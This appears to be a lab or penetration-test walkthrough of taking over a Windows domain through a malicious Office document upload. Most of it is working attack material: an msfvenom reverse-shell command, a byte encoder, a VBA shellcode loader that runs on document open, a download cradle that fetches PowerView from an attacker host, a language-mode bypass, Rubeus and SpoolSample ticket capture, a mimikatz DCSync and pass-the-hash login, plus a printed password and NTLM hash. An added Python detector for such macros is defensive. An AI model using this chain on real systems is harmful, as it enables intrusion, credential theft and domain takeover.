Target servers: 192.168.x.120
192.168.x.121
192.168.x.122
.121 has port 80 open. Visiting it shows a page that expects a .doc upload, so we write an Office macro to get a shell.
1. First generate the payload with msf
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.X.Y LPORT=8080 -f csharp
2. Encode the generated payload
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace EncryptVBA
{
    class Program
    {
        static void Main(string[] args)
        {
            // Paste the csharp-format output of msfvenom here (the array length must match the payload size)
            byte[] buf = new byte[640] { YOUR_PAYLOAD_BYTES };
            byte[] encoded = new byte[buf.Length];
            // Add 2 to every byte; the macro subtracts 2 again at run time
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
            }
            uint counter = 0;
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            // Emit the bytes as a comma-separated decimal list, with a VBA line continuation every 50 values
            foreach (byte b in encoded)
            {
                hex.AppendFormat("{0:D}, ", b);
                counter++;
                if (counter % 50 == 0)
                {
                    hex.AppendFormat("_{0}", Environment.NewLine);
                }
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}
3. Put the generated encoding into the Office macro
Note: the generated file must be .doc or .docm
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Sub MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    ' Paste the decimal list printed by the C# program here
    buf = Array(YOUR_ENCODED_BYTES)
    ' Undo the +2 encoding applied by the C# program
    For i = 0 To UBound(buf)
        buf(i) = buf(i) - 2
    Next i
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub
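As an added, defender-side example (not part of the original write-up): a small Python static check for the loader shape this macro has, namely KERNEL32 declarations of allocate/write/execute primitives, a byte-decoding loop, and an auto-run entry point such as AutoOpen or Document_Open. The sample VBA below is constructed; in practice the input would be VBA extracted from a document with a tool such as oletools' olevba.

```python
import re

# Constructed sample: the declaration and trigger shape of a VBA shellcode loader
# (no payload bytes). This is test input written for the example, not a real document.
SAMPLE_VBA = '''
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal a As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal a As LongPtr) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal a As LongPtr) As LongPtr
Sub MyMacro()
    buf = Array(1, 2, 3)
    For i = 0 To UBound(buf)
        buf(i) = buf(i) - 2
    Next i
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub AutoOpen()
    MyMacro
End Sub
'''

# Win32 primitives that together allocate, write and execute memory from VBA
INJECTION_APIS = {"virtualalloc", "virtualallocex", "rtlmovememory", "writeprocessmemory",
                  "createthread", "createremotethread", "ntallocatevirtualmemory"}
# Procedure names Office runs automatically when the document is opened
AUTOEXEC_SUBS = {"autoopen", "document_open", "auto_open", "workbook_open", "autoexec"}

DECLARE_RE = re.compile(
    r'^\s*(?:Private|Public)?\s*Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"',
    re.I | re.M)
SUB_RE = re.compile(r'^\s*(?:Private|Public)?\s*Sub\s+(\w+)\s*\(', re.I | re.M)
# A statement of the form arr(i) = arr(i) - N / + N / Xor N: simple per-byte decoding
DECODE_RE = re.compile(r'(\w+)\((\w+)\)\s*=\s*\1\(\2\)\s*(?:[-+]|Xor)\s*\d+', re.I)

def analyze_vba(src):
    """Return findings for one VBA module source string."""
    declared = {name.lower(): lib.lower() for name, lib in DECLARE_RE.findall(src)}
    apis = sorted(a for a in declared if a in INJECTION_APIS)
    triggers = sorted(s.lower() for s in SUB_RE.findall(src) if s.lower() in AUTOEXEC_SUBS)
    decode = DECODE_RE.search(src) is not None
    return {
        "declared_apis": apis,
        "autoexec_triggers": triggers,
        "decode_loop": decode,
        # Two or more injection primitives plus an auto-run entry point is the loader signature
        "suspicious": len(apis) >= 2 and bool(triggers),
    }

if __name__ == "__main__":
    print(analyze_vba(SAMPLE_VBA))
```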
Now we have the Office macro. Save it as 1.doc and upload it through the web page.
Start the msf handler at the same time.
After getting the shell, migrate the process into explorer.exe.
Change directory to C:\Windows\tasks and upload PsBypassCLM.exe.
When we try to run a .ps1 script, an error occurs. Looking it up shows that Constrained Language Mode (ConstrainedLanguageMode) is in effect, so next we bypass it with a script from GitHub, namely the PsBypassCLM.exe file uploaded earlier.
Run the tool and check again: the bypass succeeds. Of course this is not the only CLM bypass; it is just the one that worked on this target machine. Next use the PowerView.ps1 script to look up the domain password.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.y/PowerView.ps1')
Get-ADObject -Name web05 -DomainController 192.168.62.120
This returns the password ms-mcs-admpwd: S2!/[12(IO#/r( (the LAPS local administrator password attribute). Use rdesktop to log in to .121; next we need domain administrator privileges.
Run .\PsExec64.exe -accepteula -s -i cmd.exe to switch to a local administrator cmd (the -s flag runs it as SYSTEM).
In that local administrator cmd, run: .\Rubeus.exe monitor /interval:1
In PowerShell, run: .\SpoolSample.exe AD1 AD2
Rubeus then prints the captured ticket as a base64 string.
Write it to a .kirbi file: [IO.File]::WriteAllBytes("<absolute path>\TGS\ticket.kirbi", [Convert]::FromBase64String("<the base64 string obtained above>"))
Import it: .\Rubeus.exe ptt /ticket:<filename>.kirbi
Next use mimikatz:
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:AD.com /user:administrator /csv" "exit"
This returns an NTLM hash.
Log in as domain administrator: evil-winrm -u ad.com\administrator -H 5f9163ca3b673adfff2828f368ca3760 -i 192.168.X.120
GitHub project links
PsBypassCLM.exe:https://github.com/padovah4ck/PSByPassCLM
PowerView.ps1:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1